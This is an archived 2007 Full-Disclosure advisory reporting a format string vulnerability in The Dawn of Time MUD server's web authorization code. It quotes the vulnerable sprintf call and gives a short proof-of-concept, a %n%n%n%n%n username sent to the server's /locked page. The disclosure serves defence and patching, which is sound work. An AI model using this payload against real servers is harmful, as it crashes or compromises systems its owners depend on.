lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20071005224142.08b88263.aluigi@autistici.org>
Date: Fri, 5 Oct 2007 22:41:42 +0200
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com,
	news@...uriteam.com, full-disclosure@...ts.grok.org.uk, vuln@...unia.com,
	packet@...ketstormsecurity.org
Subject: Format string in The Dawn of Time 1.69s beta4


#######################################################################

                             Luigi Auriemma

Application:  The Dawn of Time
              http://www.dawnoftime.org
Versions:     <= 1.69s beta4 (and 1.69r too)
Platforms:    *nix and Windows
Bug:          format string in web server authorization
Exploitation: remote
Date:         05 Oct 2007
Author:       Luigi Auriemma
              e-mail: aluigi@...istici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Dawn of Time (aka Dawn) is a MUD server originally based on the
ROM codebase.


#######################################################################

======
2) Bug
======


A format string vulnerability is located in the function which handles
the access to the restricted zones of the internal web server like
"Reset password".
After having decoded the base64 string containing username:password the
string is used without format argument with sprintf().

from websrv.cpp:

bool processWebHeader(web_request_data *w){
                ...
                if (str_len(pLine)>0 && str_len(pLine)<200){
                    char decoded[200];
                    char *d;

                    d =decodeBase64(pLine);
                    if (d){
                        sprintf(decoded,d);
                        ...
void filterWebRequest(connection_data *c){
                    ...
                    if (str_len(pLine)>0 && str_len(pLine)<200){
                        char decoded[200];
                        char *d;

                        d =decodeBase64(pLine);
                        if (d){
                            sprintf(decoded,d);


#######################################################################

===========
3) The Code
===========


Go to:

  http://SERVER:4001/locked

and use the username %n%n%n%n%n
or just:

  http://%n%n%n%n%n:%n%n%n%n%n@...VER:4001/locked


#######################################################################

======
4) Fix
======


The bug will be officially fixed in the next release.
I have also opened a thread in the Dawn forum some days ago with the
instructions for the fix:

  http://forums.dawnoftime.org/viewtopic.php?t=2102


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org
http://forum.aluigi.org
http://mirror.aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ